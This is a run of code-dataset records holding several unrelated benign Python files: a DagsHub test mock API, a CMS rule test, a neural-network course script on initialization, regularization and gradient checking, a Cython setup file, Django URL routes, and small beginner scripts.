\"file\",\n \"size\": 0,\n \"hash\": \"some_hash\",\n \"versioning\": \"dvc\",\n \"download_url\": \"some_url\",\n \"content_url\": \"some_url\",\n },\n {\n \"path\": \"b.txt\",\n \"type\": \"file\",\n \"size\": 0,\n \"hash\": \"some_hash\",\n \"versioning\": \"dvc\",\n \"download_url\": \"some_url\",\n \"content_url\": \"some_url\",\n },\n {\n \"path\": \"c.txt\",\n \"type\": \"file\",\n \"size\": 0,\n \"hash\": \"some_hash\",\n \"versioning\": \"dvc\",\n \"download_url\": \"some_url\",\n \"content_url\": \"some_url\",\n },\n {\n \"path\": \"a.txt.dvc\",\n \"type\": \"file\",\n \"size\": 0,\n \"hash\": \"some_hash\",\n \"versioning\": \"git\",\n \"download_url\": \"some_url\",\n \"content_url\": \"some_url\",\n },\n ],\n ),\n \"storages\": Response(\n 200,\n json=[\n {\n \"name\": self.storage_bucket_path,\n \"protocol\": \"s3\",\n \"list_path\": f\"{self.repoapipath}/storage/content/s3/{self.storage_bucket_path}\"\n }\n ]\n )\n }\n\n return endpoints, responses\n\n def add_file(self, path, content=\"aaa\", status=200, is_storage=False, revision=None) -> Route:\n \"\"\"\n Add a file to the api (only accessible via the raw endpoint)\n \"\"\"\n\n # TODO: add branch\n if is_storage:\n route = self.route(url=f\"{self.api_storage_raw_path}/{path}\")\n else:\n route = self.route(url=f\"{self.api_raw_path(revision)}/{path}\")\n route.mock(Response(status, content=content))\n return route\n\n def add_dir(self, path, contents=[], status=200, is_storage=False, revision=None) -> Route:\n \"\"\"\n Add a directory to the api (only accessible via the content endpoint)\n We don't keep a tree of added dirs, so it's not dynamic\n \"\"\"\n\n # TODO: add branch\n if is_storage:\n route = self.route(url=f\"{self.api_storage_list_path}/{path}\")\n else:\n route = self.route(url=f\"{self.api_list_path(revision)}/{path}\")\n content = [\n self.generate_list_entry(os.path.join(path, c[0]), c[1]) for c in contents\n ]\n route.mock(Response(status, json=content))\n return route\n\n def add_storage_dir(self, path, contents=[], from_token=None, next_token=None, status=200):\n \"\"\"\n Add a directory to the storage api\n Storage has a different response schema\n \"\"\"\n url = f\"{self.api_storage_list_path}/{path}?paging=true\"\n if from_token is not None:\n url += f\"&from_token={from_token}\"\n route = self.route(url=url)\n content = {\n \"entries\": [\n self.generate_list_entry(os.path.join(path, c[0]), c[1]) for c in contents\n ],\n \"limit\": len(contents),\n }\n if next_token is not None:\n content[\"next_token\"] = next_token\n route.mock(Response(status, json=content))\n return route\n\n def enable_uploads(self, branch=\"main\"):\n route = self.put(\n name=\"upload\", url__regex=f\"api/v1/repos/{self.repourlpath}/content/{branch}/.*\"\n )\n route.mock(Response(200))\n return route\n\n def generate_list_entry(self, path, entry_type=\"file\"):\n return {\n \"path\": path,\n \"type\": entry_type,\n \"size\": 0,\n \"hash\": \"8586da76f372efa83d832a9d0e664817.dir\",\n \"versioning\": \"dvc\",\n \"download_url\": f\"https://dagshub.com/{self.repourlpath}/raw/{self.current_revision}/{path}\",\n \"content_url\": f\"https://dagshub.com/{self.repourlpath}/content/{self.current_revision}/{path}\",\n }\n\n def add_branch(self, branch, revision):\n resp_json = {\n \"name\": branch,\n \"commit\": {\n \"id\": revision,\n \"message\": \"Update 'README.md'\\n\",\n \"url\": \"\",\n \"author\": {\n \"name\": \"dagshub\",\n \"email\": \"info@dagshub.com\",\n \"username\": \"\",\n },\n \"committer\": {\n \"name\": \"dagshub\",\n \"email\": \"info@dagshub.com\",\n \"username\": \"\",\n },\n \"added\": None,\n \"removed\": None,\n \"modified\": None,\n \"timestamp\": \"2021-08-10T09:03:32Z\",\n }\n }\n branch_route = self.get(url=f\"/api/v1/repos/{self.repourlpath}/branches/{branch}\")\n branch_route.mock(Response(200, json=resp_json))\n return branch_route\n\n def add_commit(self, revision):\n resp_json = {\n \"commit\": {\n \"id\": revision,\n \"message\": \"Update 'README.md'\\n\",\n \"url\": \"\",\n \"author\": {\n \"name\": \"dagshub\",\n \"email\": \"info@dagshub.com\",\n \"username\": \"\",\n },\n \"committer\": {\n \"name\": \"dagshub\",\n \"email\": \"info@dagshub.com\",\n \"username\": \"\",\n },\n \"added\": None,\n \"removed\": None,\n \"modified\": None,\n \"timestamp\": \"2021-08-10T09:03:32Z\",\n }\n }\n branch_route = self.get(url=f\"/api/v1/repos/{self.repourlpath}/commits/{revision}\")\n branch_route.mock(Response(200, json=resp_json))\n return branch_route\n","repo_name":"DagsHub/client","sub_path":"tests/dda/mock_api.py","file_name":"mock_api.py","file_ext":"py","file_size_in_byte":12238,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"19"} +{"seq_id":"41520596899","text":"from zeit.edit.rule import Rule\nimport zeit.cms.interfaces\nimport zeit.content.article.testing\nimport zeit.edit.interfaces\nimport zope.security.proxy\n\n\nclass RuleTest(zeit.content.article.testing.FunctionalTestCase):\n def test_article_glob_should_apply_to_block(self):\n block = self.get_factory(self.get_article(), 'p')()\n r = Rule(\n \"\"\"\napplicable(article)\nerror_if(True, 'foo')\n\"\"\"\n )\n s = r.apply(block, zeit.edit.interfaces.IRuleGlobs(block))\n self.assertEqual(zeit.edit.rule.ERROR, s.status)\n\n def test_IReference_content_returns_referenced_object(self):\n self.repository['info'] = zeit.content.infobox.infobox.Infobox()\n block = self.get_factory(self.get_article(), 'infobox')()\n block.references = self.repository['info']\n block = zope.security.proxy.ProxyFactory(block)\n r = Rule(\n \"\"\"\nfrom zeit.content.infobox.interfaces import IInfobox\napplicable(True)\nerror_if(IInfobox.providedBy(content[0]), 'foo')\n\"\"\"\n )\n s = r.apply(block, zeit.edit.interfaces.IRuleGlobs(block))\n self.assertEqual(zeit.edit.rule.ERROR, s.status)\n\n def test_IImage_content_returns_referenced_object(self):\n block = self.get_factory(self.get_article(), 'image')()\n image = 'http://xml.zeit.de/2006/DSC00109_2.JPG'\n block.references = block.references.create(zeit.cms.interfaces.ICMSContent(image))\n r = Rule(\n \"\"\"\nfrom zeit.content.image.interfaces import IImage\napplicable(True)\nerror_if(IImage.providedBy(content[0]), 'foo')\n\"\"\"\n )\n s = r.apply(block, zeit.edit.interfaces.IRuleGlobs(block))\n self.assertEqual(zeit.edit.rule.ERROR, s.status)\n\n def test_IVolume_content_returns_referenced_object(self):\n from zeit.content.volume.volume import Volume\n\n volume = Volume()\n volume.year = 2015\n volume.volume = 1\n volume.product = zeit.cms.content.sources.Product('ZEI')\n zeit.cms.content.add.find_or_create_folder('2015', '01')\n self.repository['2015']['01']['ausgabe'] = volume\n block = self.get_factory(self.get_article(), 'volume')()\n block.references = block.references.create(volume)\n r = Rule(\n \"\"\"\nfrom zeit.content.volume.interfaces import IVolume\napplicable(True)\nerror_if(IVolume.providedBy(content[0]), 'bar')\n\"\"\"\n )\n s = r.apply(block, zeit.edit.interfaces.IRuleGlobs(block))\n self.assertEqual(zeit.edit.rule.ERROR, s.status)\n","repo_name":"ZeitOnline/vivi","sub_path":"core/src/zeit/content/article/edit/tests/test_rule.py","file_name":"test_rule.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"33290114182","text":"from math import pi \n\ndef circle_area(r):\n \"\"\"Return area pf the circle dor the given radius.\"\"\"\n return pi * r**2\n\nraw_r = input(\"Proszę, podaj mi promień koła:\")\ntest_list = raw_r.split('.')\ntry:\n r = float(raw_r)\n area = circle_area(r)\n print(f\"Pole koła o promieniu {r} wynosi {round(area, 2)}\")\nexcept ValueError:\n print(\"Cos poszlo nie tak!\")","repo_name":"jgrynczewski/sredzaw","sub_path":"3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3177802194","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sklearn\nimport sklearn.datasets\nimport scipy.io\n\n#激活函数\ndef sigmoid(x):\n s = 1/(1+np.exp(-x))\n return s\n\ndef relu(x):\n s = np.maximum(0,x)\n return s\n\n#初始化数据集\ndef load_dataset():\n np.random.seed(1)\n train_X, train_Y = sklearn.datasets.make_circles(n_samples=300, noise=.05)\n np.random.seed(2)\n test_X, test_Y = sklearn.datasets.make_circles(n_samples=100, noise=.05)\n # Visualize the data\n plt.scatter(train_X[:, 0], train_X[:, 1], c=train_Y, s=40, cmap=plt.cm.Spectral);\n train_X = train_X.T\n train_Y = train_Y.reshape((1, train_Y.shape[0]))\n test_X = test_X.T\n test_Y = test_Y.reshape((1, test_Y.shape[0]))\n return train_X, train_Y, test_X, test_Y\n\ndef load_2D_dataset():\n data = scipy.io.loadmat('data.mat')\n train_X = data['X'].T\n train_Y = data['y'].T\n test_X = data['Xval'].T\n test_Y = data['yval'].T\n\n plt.scatter(train_X[0, :], train_X[1, :], c=train_Y, s=40, cmap=plt.cm.Spectral);\n \n return train_X, train_Y, test_X, test_Y\n\n#画出分界\ndef plot_decision_boundary(model, X, y):\n # Set min and max values and give it some padding\n x_min, x_max = X[0, :].min() - 1, X[0, :].max() + 1\n y_min, y_max = X[1, :].min() - 1, X[1, :].max() + 1\n h = 0.01\n # Generate a grid of points with distance h between them\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))\n # Predict the function value for the whole grid\n Z = model(np.c_[xx.ravel(), yy.ravel()])\n Z = Z.reshape(xx.shape)\n # Plot the contour and training examples\n plt.contourf(xx, yy, Z, cmap=plt.cm.Spectral)\n plt.ylabel('x2')\n plt.xlabel('x1')\n plt.scatter(X[0, :], X[1, :], c=y, cmap=plt.cm.Spectral)\n plt.show()\n \ndef predict_dec(parameters, X):\n \n a3, cache = forward_propagation(X, parameters)\n predictions = (a3>0.5)\n \n return predictions\n\n#前向传播\ndef forward_propagation(X, parameters):\n\n W1 = parameters[\"W1\"]\n b1 = parameters[\"b1\"]\n W2 = parameters[\"W2\"]\n b2 = parameters[\"b2\"]\n W3 = parameters[\"W3\"]\n b3 = parameters[\"b3\"]\n \n # LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SIGMOID\n z1 = np.dot(W1, X) + b1\n a1 = relu(z1)\n z2 = np.dot(W2, a1) + b2\n a2 = relu(z2)\n z3 = np.dot(W3, a2) + b3\n a3 = sigmoid(z3)\n \n cache = (z1, a1, W1, b1, z2, a2, W2, b2, z3, a3, W3, b3)\n \n return a3, cache\n\n#反向传播\ndef backward_propagation(X, Y, cache):\n \n m = X.shape[1]\n (z1, a1, W1, b1, z2, a2, W2, b2, z3, a3, W3, b3) = cache\n \n dz3 = 1./m * (a3 - Y)\n dW3 = np.dot(dz3, a2.T)\n db3 = np.sum(dz3, axis=1, keepdims = True)\n \n da2 = np.dot(W3.T, dz3)\n dz2 = np.multiply(da2, np.int64(a2 > 0))\n dW2 = np.dot(dz2, a1.T)\n db2 = np.sum(dz2, axis=1, keepdims = True)\n \n da1 = np.dot(W2.T, dz2)\n dz1 = np.multiply(da1, np.int64(a1 > 0))\n dW1 = np.dot(dz1, X.T)\n db1 = np.sum(dz1, axis=1, keepdims = True)\n \n gradients = {\"dz3\": dz3, \"dW3\": dW3, \"db3\": db3,\n \"da2\": da2, \"dz2\": dz2, \"dW2\": dW2, \"db2\": db2,\n \"da1\": da1, \"dz1\": dz1, \"dW1\": dW1, \"db1\": db1}\n \n return gradients\n\n#计算成本\ndef compute_cost(a3, Y):\n \n m = Y.shape[1]\n logprobs = np.multiply(-np.log(a3),Y) + np.multiply(-np.log(1 - a3), 1 - Y)\n loss = 1./m * np.nansum(logprobs)\n \n return loss\n\n#更新参数\ndef update_parameters(parameters, grads, learning_rate):\n \n n = len(parameters) // 2 \n for k in range(n):\n parameters[\"W\" + str(k+1)] = parameters[\"W\" + str(k+1)] - learning_rate * grads[\"dW\" + str(k+1)]\n parameters[\"b\" + str(k+1)] = parameters[\"b\" + str(k+1)] - learning_rate * grads[\"db\" + str(k+1)]\n \n return parameters\n\n#预测结果\ndef predict(X, y, parameters):\n\n m = X.shape[1]\n p = np.zeros((1,m), dtype = np.int)\n \n a3, caches = forward_propagation(X, parameters)\n\n for i in range(0, a3.shape[1]):\n if a3[0,i] > 0.5:\n p[0,i] = 1\n else:\n p[0,i] = 0\n print(\"识别准确度: \" + str(np.mean((p[0,:] == y[0,:]))))\n \n return p\n\n#建立整个模型\ndef model(X, Y, learning_rate = 0.01, layers_dims = [], num_iterations = 15000, initialization = \"he\", lambd = 0, keep_prob = 1, print_cost = True):\n \n grads = {}\n costs = [] \n m = X.shape[1] \n \n #三种参数初始化\n if initialization == \"zeros\":\n parameters = initialize_parameters_zeros(layers_dims)\n elif initialization == \"random\":\n parameters = initialize_parameters_random(layers_dims)\n elif initialization == \"he\":\n parameters = initialize_parameters_he(layers_dims)\n \n for i in range(0, num_iterations):\n\n # 前向传播: LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SIGMOID.\n if keep_prob == 1:\n a3, cache = forward_propagation(X, parameters)\n elif keep_prob < 1:\n a3, cache = forward_propagation_with_dropout(X, parameters, keep_prob)\n \n # 损失函数\n if lambd == 0:\n cost = compute_cost(a3, Y)\n else:\n cost = compute_cost_with_regularization(a3, Y, parameters, lambd)\n \n if lambd == 0 and keep_prob == 1:\n grads = backward_propagation(X, Y, cache)\n elif lambd != 0:\n grads = backward_propagation_with_regularization(X, Y, cache, lambd) #L2正则化\n elif keep_prob < 1:\n grads = backward_propagation_with_dropout(X, Y, cache, keep_prob) #DropOut正则化\n \n #更新参数 \n parameters = update_parameters(parameters, grads, learning_rate)\n \n if print_cost and i % 3000 == 0:\n print(\"循环{}次后的成本值: {}\".format(i, cost))\n if print_cost and i % 1000 == 0:\n costs.append(cost)\n \n #画出成本曲线\n plt.plot(costs)\n plt.ylabel('cost')\n plt.xlabel('iterations (x1,000)')\n plt.title(\"Learning rate =\" + str(learning_rate))\n plt.show()\n \n return parameters\n\n#参数w,b初始化为0\ndef initialize_parameters_zeros(layers_dims):\n \n parameters = {}\n L = len(layers_dims) \n \n for l in range(1, L):\n parameters['W' + str(l)] = np.zeros((layers_dims[l],layers_dims[l-1]))\n parameters['b' + str(l)] = np.zeros((layers_dims[l],1))\n return parameters\n\n#参数w初始化为random\ndef initialize_parameters_random(layers_dims):\n \n np.random.seed(3) \n parameters = {}\n L = len(layers_dims) \n \n for l in range(1, L):\n parameters['W' + str(l)] = np.random.randn(layers_dims[l],layers_dims[l-1]) * 10\n parameters['b' + str(l)] = np.zeros((layers_dims[l],1))\n return parameters\n \n#参数w进行Xavier初始化\ndef initialize_parameters_he(layers_dims):\n \n np.random.seed(3)\n parameters = {}\n L = len(layers_dims) - 1\n \n for l in range(1, L + 1):\n parameters['W' + str(l)] = np.random.randn(layers_dims[l],layers_dims[l-1]) * np.sqrt(1.0/(layers_dims[l-1]))\n parameters['b' + str(l)] = np.zeros((layers_dims[l],1))\n return parameters\n\n#L2正则化下损失计算\ndef compute_cost_with_regularization(A3, Y, parameters, lambd):\n m = Y.shape[1]\n W1 = parameters[\"W1\"]\n W2 = parameters[\"W2\"]\n W3 = parameters[\"W3\"]\n \n cross_entropy_cost = compute_cost(A3, Y)\n L2_regularization_cost = lambd*(np.sum(np.square(W1))+np.sum(np.square(W2))+np.sum(np.square(W3)))/(2*m) #L2正则化项\n cost = cross_entropy_cost + L2_regularization_cost\n \n return cost\n\n#L2正则化下反向传播\ndef backward_propagation_with_regularization(X, Y, cache, lambd):\n \n m = X.shape[1]\n (Z1, A1, W1, b1, Z2, A2, W2, b2, Z3, A3, W3, b3) = cache\n \n dZ3 = A3 - Y\n \n dW3 = 1./m * np.dot(dZ3, A2.T) + lambd*W3/m\n db3 = 1./m * np.sum(dZ3, axis=1, keepdims = True)\n \n dA2 = np.dot(W3.T, dZ3)\n dZ2 = np.multiply(dA2, np.int64(A2 > 0))\n dW2 = 1./m * np.dot(dZ2, A1.T) + lambd*W2/m\n db2 = 1./m * np.sum(dZ2, axis=1, keepdims = True)\n \n dA1 = np.dot(W2.T, dZ2)\n dZ1 = np.multiply(dA1, np.int64(A1 > 0))\n dW1 = 1./m * np.dot(dZ1, X.T) + lambd*W1/m\n db1 = 1./m * np.sum(dZ1, axis=1, keepdims = True)\n \n gradients = {\"dZ3\": dZ3, \"dW3\": dW3, \"db3\": db3,\"dA2\": dA2,\n \"dZ2\": dZ2, \"dW2\": dW2, \"db2\": db2, \"dA1\": dA1, \n \"dZ1\": dZ1, \"dW1\": dW1, \"db1\": db1}\n \n return gradients\n\n#DropOut正则化下前向传播\ndef forward_propagation_with_dropout(X, parameters, keep_prob = 0.5):\n\n np.random.seed(1)\n \n W1 = parameters[\"W1\"]\n b1 = parameters[\"b1\"]\n W2 = parameters[\"W2\"]\n b2 = parameters[\"b2\"]\n W3 = parameters[\"W3\"]\n b3 = parameters[\"b3\"]\n \n # LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SIGMOID\n Z1 = np.dot(W1, X) + b1\n A1 = relu(Z1)\n D1 = np.random.rand(A1.shape[0],A1.shape[1]) \n D1 = D1 < keep_prob \n A1 = np.multiply(A1,D1) \n A1 = A1 / keep_prob \n \n Z2 = np.dot(W2, A1) + b2\n A2 = relu(Z2)\n D2 = np.random.rand(A2.shape[0],A2.shape[1]) \n D2 = D2 < keep_prob \n A2 = np.multiply(A2,D2) \n A2 = A2 / keep_prob \n\n Z3 = np.dot(W3, A2) + b3\n A3 = sigmoid(Z3)\n \n cache = (Z1, D1, A1, W1, b1, Z2, D2, A2, W2, b2, Z3, A3, W3, b3)\n \n return A3, cache\n\n#DropOut正则化下反向传播\ndef backward_propagation_with_dropout(X, Y, cache, keep_prob):\n \n m = X.shape[1]\n (Z1, D1, A1, W1, b1, Z2, D2, A2, W2, b2, Z3, A3, W3, b3) = cache\n \n dZ3 = A3 - Y\n dW3 = 1./m * np.dot(dZ3, A2.T)\n db3 = 1./m * np.sum(dZ3, axis=1, keepdims = True)\n \n dA2 = np.dot(W3.T, dZ3)\n dA2 = np.multiply(dA2,D2) \n dA2 = dA2 / keep_prob \n dZ2 = np.multiply(dA2, np.int64(A2 > 0))\n dW2 = 1./m * np.dot(dZ2, A1.T)\n db2 = 1./m * np.sum(dZ2, axis=1, keepdims = True)\n \n dA1 = np.dot(W2.T, dZ2)\n dA1 = np.multiply(dA1,D1) \n dA1 = dA1 / keep_prob \n dZ1 = np.multiply(dA1, np.int64(A1 > 0))\n dW1 = 1./m * np.dot(dZ1, X.T)\n db1 = 1./m * np.sum(dZ1, axis=1, keepdims = True)\n \n gradients = {\"dZ3\": dZ3, \"dW3\": dW3, \"db3\": db3,\"dA2\": dA2,\n \"dZ2\": dZ2, \"dW2\": dW2, \"db2\": db2, \"dA1\": dA1, \n \"dZ1\": dZ1, \"dW1\": dW1, \"db1\": db1}\n \n return gradients\n\n#梯度检验转换\ndef dictionary_to_vector(parameters):\n keys = []\n count = 0\n for key in [\"W1\", \"b1\", \"W2\", \"b2\", \"W3\", \"b3\"]:\n \n # flatten parameter\n new_vector = np.reshape(parameters[key], (-1,1))\n keys = keys + [key]*new_vector.shape[0]\n \n if count == 0:\n theta = new_vector\n else:\n theta = np.concatenate((theta, new_vector), axis=0)\n count = count + 1\n\n return theta, keys\n\ndef vector_to_dictionary(theta):\n\n parameters = {}\n parameters[\"W1\"] = theta[:20].reshape((5,4))\n parameters[\"b1\"] = theta[20:25].reshape((5,1))\n parameters[\"W2\"] = theta[25:40].reshape((3,5))\n parameters[\"b2\"] = theta[40:43].reshape((3,1))\n parameters[\"W3\"] = theta[43:46].reshape((1,3))\n parameters[\"b3\"] = theta[46:47].reshape((1,1))\n\n return parameters\n\ndef gradients_to_vector(gradients):\n\n count = 0\n for key in [\"dW1\", \"db1\", \"dW2\", \"db2\", \"dW3\", \"db3\"]:\n # flatten parameter\n new_vector = np.reshape(gradients[key], (-1,1))\n \n if count == 0:\n theta = new_vector\n else:\n theta = np.concatenate((theta, new_vector), axis=0)\n count = count + 1\n\n return theta\n\n#梯度检验中的前向传播\ndef forward_propagation_n(X, Y, parameters):\n\n m = X.shape[1]\n W1 = parameters[\"W1\"]\n b1 = parameters[\"b1\"]\n W2 = parameters[\"W2\"]\n b2 = parameters[\"b2\"]\n W3 = parameters[\"W3\"]\n b3 = parameters[\"b3\"]\n\n # LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SIGMOID\n Z1 = np.dot(W1, X) + b1\n A1 = relu(Z1)\n Z2 = np.dot(W2, A1) + b2\n A2 = relu(Z2)\n Z3 = np.dot(W3, A2) + b3\n A3 = sigmoid(Z3)\n\n # Cost\n logprobs = np.multiply(-np.log(A3),Y) + np.multiply(-np.log(1 - A3), 1 - Y)\n cost = 1./m * np.sum(logprobs)\n \n cache = (Z1, A1, W1, b1, Z2, A2, W2, b2, Z3, A3, W3, b3)\n \n return cost, cache\n\n#梯度检验中的反向传播\ndef backward_propagation_n(X, Y, cache):\n m = X.shape[1]\n (Z1, A1, W1, b1, Z2, A2, W2, b2, Z3, A3, W3, b3) = cache\n \n dZ3 = A3 - Y\n dW3 = 1./m * np.dot(dZ3, A2.T)\n db3 = 1./m * np.sum(dZ3, axis=1, keepdims = True)\n \n dA2 = np.dot(W3.T, dZ3)\n dZ2 = np.multiply(dA2, np.int64(A2 > 0))\n dW2 = 1./m * np.dot(dZ2, A1.T) * 2\n db2 = 1./m * np.sum(dZ2, axis=1, keepdims = True)\n \n dA1 = np.dot(W2.T, dZ2)\n dZ1 = np.multiply(dA1, np.int64(A1 > 0))\n dW1 = 1./m * np.dot(dZ1, X.T)\n db1 = 4./m * np.sum(dZ1, axis=1, keepdims = True)\n \n gradients = {\"dZ3\": dZ3, \"dW3\": dW3, \"db3\": db3,\n \"dA2\": dA2, \"dZ2\": dZ2, \"dW2\": dW2, \"db2\": db2,\n \"dA1\": dA1, \"dZ1\": dZ1, \"dW1\": dW1, \"db1\": db1}\n \n return gradients\n\n#三种Initialization比较\ntrain_X, train_Y, test_X, test_Y = load_dataset()\nlayers = [train_X.shape[0], 10, 5, 1] #设置神经网络层数及节点数\n\n#参数初始化为0\nparameters_init_zeros = model(train_X, train_Y, layers_dims = layers, initialization = \"zeros\")\n\n#初始化random\nparameters_init_random = model(train_X, train_Y, layers_dims = layers, initialization = \"random\")\n\n#Xavier初始化\nparameters_init_he = model(train_X, train_Y, layers_dims = layers, initialization = \"he\")\n\n#参数初始化为0时\nplt.title(\"Model with Zeros initialization\")\naxes = plt.gca()\naxes.set_xlim([-1.5,1.5])\naxes.set_ylim([-1.5,1.5])\nplot_decision_boundary(lambda x: predict_dec(parameters_init_zeros, x.T), train_X, train_Y)\nprint (\"训练集中:\")\npredictions_train = predict(train_X, train_Y, parameters_init_zeros)\nprint (\"测试集中:\")\npredictions_test = predict(test_X, test_Y, parameters_init_zeros)\n\n#参数初始化为random时\nplt.title(\"Model with large random initialization\")\naxes = plt.gca()\naxes.set_xlim([-1.5,1.5])\naxes.set_ylim([-1.5,1.5])\nplot_decision_boundary(lambda x: predict_dec(parameters_init_random, x.T), train_X, train_Y)\nprint (\"训练集中:\")\npredictions_train = predict(train_X, train_Y, parameters_init_random)\nprint (\"测试集中:\")\npredictions_test = predict(test_X, test_Y, parameters_init_random)\n\n#Xavier初始化\nplt.title(\"Model with He initialization\")\naxes = plt.gca()\naxes.set_xlim([-1.5,1.5])\naxes.set_ylim([-1.5,1.5])\nplot_decision_boundary(lambda x: predict_dec(parameters_init_he, x.T), train_X, train_Y)\nprint (\"训练集中:\")\npredictions_train = predict(train_X, train_Y, parameters_init_he)\nprint (\"测试集中:\")\npredictions_test = predict(test_X, test_Y, parameters_init_he)\n\n#几种Regularization比较\ntrain_x, train_y, test_x, test_y = load_2D_dataset()\nlayers = [train_x.shape[0], 20, 3, 1] #设置神经网络层数及节点数\n\n#不进行正则化\nparameters_no_reg = model(train_x, train_y, layers_dims = layers, learning_rate = 0.3, num_iterations = 30000)\n\n#采用L2正则化\nparameters_L2_reg = model(train_x, train_y, layers_dims = layers, learning_rate = 0.3, num_iterations = 30000, lambd = 0.7)\n\n#采用DropOut正则化\nparameters_dropout_reg = model(train_x, train_y, layers_dims = layers, learning_rate = 0.3, num_iterations = 30000, keep_prob = 0.86)\n\n#不进行正则化\nplt.title(\"Model without regularization\")\naxes = plt.gca()\naxes.set_xlim([-0.75,0.40])\naxes.set_ylim([-0.75,0.65])\nplot_decision_boundary(lambda x: predict_dec(parameters_no_reg, x.T), train_x, train_y)\nprint (\"训练集中:\")\npredictions_train = predict(train_x, train_y, parameters_no_reg)\nprint (\"测试集中:\")\npredictions_test = predict(test_x, test_y, parameters_no_reg)\n\n#进行L2正则化\nplt.title(\"Model with L2-regularization\")\naxes = plt.gca()\naxes.set_xlim([-0.75,0.40])\naxes.set_ylim([-0.75,0.65])\nplot_decision_boundary(lambda x: predict_dec(parameters_L2_reg, x.T), train_x, train_y)\nprint (\"训练集中:\")\npredictions_train = predict(train_x, train_y, parameters_L2_reg)\nprint (\"测试集中:\")\npredictions_test = predict(test_x, test_y, parameters_L2_reg)\n\n#DropOut正则化\nplt.title(\"Model with dropout\")\naxes = plt.gca()\naxes.set_xlim([-0.75,0.40])\naxes.set_ylim([-0.75,0.65])\nplot_decision_boundary(lambda x: predict_dec(parameters_dropout_reg, x.T), train_x, train_y)\nprint (\"训练集中:\")\npredictions_train = predict(train_x, train_y, parameters_dropout_reg)\nprint (\"测试集中:\")\npredictions_test = predict(test_x, test_y, parameters_dropout_reg)\n\n#梯度检验\ndef gradient_check_n(parameters, gradients, X, Y, epsilon = 1e-7):\n\n parameters_values, _ = dictionary_to_vector(parameters)\n grad = gradients_to_vector(gradients)\n num_parameters = parameters_values.shape[0]\n J_plus = np.zeros((num_parameters, 1))\n J_minus = np.zeros((num_parameters, 1))\n gradapprox = np.zeros((num_parameters, 1))\n \n for i in range(num_parameters):\n \n thetaplus = np.copy(parameters_values) \n thetaplus[i][0] = thetaplus[i][0] + epsilon \n J_plus[i], _ = forward_propagation_n(X, Y, vector_to_dictionary(thetaplus)) \n \n thetaminus = np.copy(parameters_values) \n thetaminus[i][0] = thetaminus[i][0] - epsilon \n J_minus[i], _ = forward_propagation_n(X, Y, vector_to_dictionary(thetaminus)) \n gradapprox[i] = (J_plus[i] - J_minus[i])/(2*epsilon) \n \n numerator = np.linalg.norm(grad - gradapprox) \n denominator = np.linalg.norm(grad) + np.linalg.norm(gradapprox) \n difference = numerator/denominator \n\n if difference > 1e-7:\n print (\"\\033[93m\" + \"There is a mistake in the backward propagation! difference = \" + str(difference) + \"\\033[0m\")\n else:\n print (\"\\033[92m\" + \"Your backward propagation works perfectly fine! difference = \" + str(difference) + \"\\033[0m\")\n \n return difference\n\n","repo_name":"qwe2508/deeplearningcourse","sub_path":"neural_network_improve_Python/Initialization_Regularization_Gradient-Checking.py","file_name":"Initialization_Regularization_Gradient-Checking.py","file_ext":"py","file_size_in_byte":18638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21685158211","text":"from distutils.core import setup, Extension\nfrom Cython.Build import cythonize\nimport numpy as np\n\next = Extension(\"gbssl\",sources=[\"nodes.c\",\"pairs.c\",\"graph.c\",\"potts.c\",\n \"ssl.c\",\"interface.pyx\"],\n libraries=[\"gsl\",\"gslcblas\"],\n extra_compile_args=[\"-fopenmp\", \"-I/usr/include/gsl -lgsl -lgslblasnative\"],\n extra_link_args=[\"-fopenmp\", \"-I/usr/include/gsl -lgsl -lgslblasnative\"],\n include_dirs=[np.get_include()],\n language=\"c\")\n\nsetup(ext_modules=cythonize(ext))","repo_name":"boureau93/ssl-nmf","sub_path":"lib/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5329673150","text":"from django.urls import path\nfrom .views import note_list, note_detail, note_create, note_delete\n\n\nurlpatterns = [\n path('', note_list, name='list'),\n path('/', note_detail, name='detail'),\n path('create/', note_create, name='create'),\n path('delete/', note_delete, name='delete'),\n]","repo_name":"MironBerch/collection-of-projects","sub_path":"Crud-Django-App/crud/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"27583185130","text":"import tkinter as tk\n\nroot = tk.Tk()\nf_height = 1000\nf_width =500\nroot.geometry(\"1000x500\")\nframe = tk.Frame(root, height= f_height, width= f_width)\ncan = tk.Canvas(frame)\nx1,y1,x2,y2 = 0,10,20,400\n\nfor i in range(100):\n x1+= 30\n x2+= 30\n can.create_rectangle(x1,y1,x2,y2,fill=\"yellow\")\n frame.pack()\n can.pack()\nroot.mainloop()","repo_name":"Trent-Farley/All-Code","sub_path":"Python_2/Assignment_6/graph_search.py","file_name":"graph_search.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"46221721523","text":"numbers = {'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000}\n\n\ndef convert(s):\n total = 0\n last = 0\n\n for n in map(lambda c: numbers[c], reversed(list(s))):\n if n >= last:\n total += n\n last = n\n else:\n total -= n\n last = n\n\n return total\n\nprint(convert(input()))\n\n","repo_name":"RomanVlasenko/adaptive-python","sub_path":"5_4_Roman_number_to_decimal.py","file_name":"5_4_Roman_number_to_decimal.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1388774726","text":"import numpy as np\nimport pandas as pd\nimport copy\nimport pickle\nimport 